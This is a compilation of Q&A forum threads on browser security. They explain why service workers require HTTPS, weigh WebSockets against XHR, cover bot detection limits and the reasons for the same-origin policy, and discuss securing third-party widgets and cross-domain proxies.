I am learning about service worker API. I found more cool features in it. But what excites me is that why it work only on https site and not on http site?.
I believe this is something to do with security yet I couldn't find the reason while I browse. So any explanation explaining this is appreciated...
Since service workers are rather powerful, being able to run even when the original page is no longer open, you'll really want to limit who can set up a service worker and who can't. Since a plain HTTP request is very easily man-in-the-middled, any random Javascript could be injected into such a request, which could set up a service worker. Which means, your ISP, a government like China, or a serious attacker could set up service workers very easily. By requiring an HTTPS connection, men-in-the-middle are largely avoided and you can at least assure that the Javascript that sets up the service worker actually came from the page you think it did.
To complement #deceze answer, if an attacker man-in-the-middle a connection to an HTTP site, it can compromises this site this time only — a later connection to the site is not guaranteed to be compromised, and for instance for attacks that rely on local network accesses, may not be easily reproductible.
If one could use a service worker on http web sites, an attacker needs to just do one man-in-the-middle attack to be forever (or at least until that browser is cleared) the source of the content for the said site.
Related
I am designing an architecture for a web application using Node.js, and we need to be able to send medium size files to the client from a gallery. As a user browses the gallery, they will be sent these binary files as fast as possible(for each gallery item). The files could go up to 6Mb, but probably average around 2Mb.
My client is insisting that we should use websockets for data transfer instead of XHR. Just to be clear, we don't need bi-directional communication.
I lack the experience in this domain and need help in my reasoning.
My points so far are the following:
Using WebSockets breaks any client-side caching that would be provided by HTTP. Users would be forced to re-download content if they visited the same item in the gallery twice.
WebSocket messages cannot be handled by/routed to proxy caches. They must always be handled by an explicit server.
CDNs are built to provide extensive web caching, intercepting HTTP requests. WebSockets would limit us from leveraging CDNs.
I guess that Nodejs would be able to respond faster to hundreds/thousands of XHR than concurrent websocket connections.
Are there any technical arguments for/against using websockets for pure data transfer over standard HTTPRequests. Can anyone nullify/clarify my points and maybe provide links to help with my research?
I found this link very helpful: https://www.mnot.net/cache_docs/#PROXY
Off the top of my head, I can see the following technical arguments for XHR besides that it uses HTTP and is therefore better at caching (which is essential for speed):
HTTP is the dedicated protocol for file downloads. It's natively built into browsers (with the XHR interface), therefore better optimised and easier to use for the developer
HTTP already features a lot of the things you'd need to hand-craft with websockets, like file path requests, auth, sessions, caching… All both on the client and server side.
XHR has better support even in older browsers
some firewalls only allow HTTP(S) connections
There do not seem to be any technical reasons to prefer web sockets - the only thing that might affect your choice is "the client is king". You might be able to convince him though by telling him how much he has to pay you to reimplement the HTTP features on a websocket connection. It ain't cheap, especially when your application gets more complex.
Btw, I wouldn't support your last point. Node should be able to deal with just as many websocket connections as HTTP connections; if properly optimised all things are even. However, if your server architecture is not based solely on node, there is a multitude of plain file serving applications that are probably faster than node (not even counting the HTTP caching layer).
As part of a thought experiment, I am attempting to ascertain whether there is any hope in a server providing a piece of data only for receipt and use by a browser environment, i.e. which could not be read by a bot crawling my site.
Clearly, if that information is sent in the source code, or indeed via any usual HTTP means, this can be picked up by a bot - so far, so simple.
But what about if the information was transmitted by the server instead as a websocket message: Wouldn't this be receivable only by some corresponding (and possibly authenticated) JavaScript in the browser environment, thus precluding its interception by a bot?
(This is based on my assumption that a bot has no client environment and is essentially a malicious server-side script calling a site over something like cURL, pretending to be a user).
Another way of phrasing this question might be: with the web implementation of websockets, is the receipt of messages always done by a client environment (i.e. JS)?
I can't answer about websockets, but a sufficiently motivated attacker will find a way to emulate whatever environment you require. By loading this content through ajax, you can eliminate the casual bots. You can eliminate well behaved bots with robots.txt.
Using WebSocket makes no difference. You cannot escape the following fact: you can always write a non-browser client that looks and behaves to the server exactly as any standard browser.
I can fake: any HTTP headers (like browser vendor etc) you might read. The origin header doesn't help either (I can fake it). Neither does cookies. I'll read them and give it back.
You might get away by protecting your site with strong captchas, and set cookies only after the captcha was solved. That depends on the captcha being unsolvable by bots ..
Given the simplicity of writing a server side proxy that fetches data across domains, I'm at a loss as to what the initial intention was in preventing client side AJAX from making calls across domains. I'm not asking for speculation, I'm looking for documentation from the language designers (or people close to them) for what they thought they were doing, other than simply creating a mild inconvenience for developers.
TIA
It's to prevent that a browser acts as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that in that office exists an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross domain policy wouldn't exists, www.evil.com could made ajax requests to http://intranet.company.com, using your browser as a reverse proxy, and send that information to www.evil.com with another Ajax request.
This one of the reasons of the restriction I guess.
If you're the author for myblog.com and you make an XHR to facebook.com, should the request send your facebook cookie credentials? No, that would mean that you could request users' private facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless facebook's script decides to send you the information from their JS code, you won't have access to it
The most important reason for this limit is a security concern: should JSON request make browser serve and accept cookies or security credentials with request to another domain? It is not a concern with server-side proxy, because it don't have direct access to client environment. There was a proposal for safe sanitized JSON-specific request methods, but it wasn't implemented anywhere yet.
The difference between direct access and a proxy are cookies and other security relevant identification/verification information which are absolutely restricted to one origin.
With those, your browser can access sensitive data. Your proxy won't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.
I know you are asking for experts' answers, I'm just a neophyte, and this is my opinion to why the server side proxy is not a proper final solution:
Building a server side proxy is not as easy as not build it at all.
Not always is possible like in a Third Party JS widget. You are not gonna ask all your publisher to declare a DNS register for integrate your widget. And modify the document.domain of his pages with the colateral issues.
As I read in the book Third Party Javascript "it requires loading an intermediary tunnel file before it can make cross-domain requests". At least you put JSONP in the game with more tricky juggling.
Not supported by IE8, also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security matters as people have explained in other answers, even more than them, you can check the chapter 4.3.2 Message exchange using subdomain proxies of the above book.
And the most important for me:
It is a hack.. like the JSONP solution, it's time for an standard, reliable, secure, clean and confortable solution.
But, after re-read your question, I think I still didn't answer it, so Why this AJAX security?, again I think, the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server into your office's intranet
We have a "widget" that runs on 3rd party websites, that is, anyone who signs up with our service and embeds the JavaScript.
At the moment we use JSONP for all communication. We can securely sign people in and create accounts via the use of an iFrame and some magic with detecting load events on it. (Essentially, we wait until the iFrames source is pointing back to the clients domain before reading a success value out of the title of it).
Because we're running on JSONP, we can use the browsers HTTP cookies to detect if the user is logged in.
However, we're in the process of transitioning our system to run realtime and over web sockets. We will still have the same method for authentication but we won't necessarily be making other calls using JSONP. Instead those calls will occur over websockets (using the library Faye)
How can I secure this? The potential security holes is if someone copies the JavaScript off an existing site, alters it, then gets people to visit their site instead. I think this defeats my original idea of sending back a secure token on login as the malicious JavaScript would be able to read it then use it perform authenticated actions.
Am I better off keeping my secure actions running over regular JSONP and my updates over WebSockets?
Websocket connections receive cookies only during the opening handshake. The only site that can access your websocket connection is the one that opened it, so if you're opening your connection after authentication then I presume your security will be comparable to your current JSONP implementation.
That is not to say that your JSONP implementation is secure. I don't know that it isn't, but are you checking the referrers for your JSONP requests to ensure they're really coming from the same 3rd-party site that logged in? If not, you already have a security issue from other sites embedding your javascript.
In any case, the 3rd-party having an XSS vulnerability would also be a very big problem, but presumably you know that already.
Whether you are sent cookies during opening WebSocket handshake by browser (and if so, what cookies) is not specified by the WS spec. It's left up to browser vendors.
A WS connection can be opened to any site, not only the site originally serving the JS doing the connection. However, browsers MUST set the "Origin" HTTP header in the WS opening handshake to the one originally serving the JS. The server is then free to accept or deny the connection.
You could i.e. generate a random string in JS, store that client side, and let that plus the client IP take part in computing an auth token for WS ..
http://developer.yahoo.com/javascript/howto-proxy.html
Are there disadvantages to this technique? The advantage is obvious, that you can use a proxy to get XML or JavaScript on another domain with XMLHttpRequest without running into same-origin restrictions. However, I do not hear about disadvantages over other methods -- are there, and what might they be?
Overhead - things are going to be a bit slower because you're going through an intermediary.
There are security issues if you allow access to any external site via the proxy - be sure to lock it down to the specific site (and probably specific URL) of the resource you're proxying.
Overhead -- both for the user (who know hsa to wait for you server to make and receive data from the proxied source) and you (as you're now taking on all the traffic for the other server in addition to your own).
Also security concerns -- if you are using a proxy to bypass browser security checks for displaying untrusted content, you are deliberately sabotaging the browser security model -- potentially allowing the user to be compromised -- so unless you absolutely trust the server you are communicating with (that means no random ads, no user defined content in the page[s] you are proxying) you should not do this.
I suppose there could be security considerations, though others are likely to be more qualified than me to address that. I've been running such a proxy on my personal site for a while now and haven't run into problems.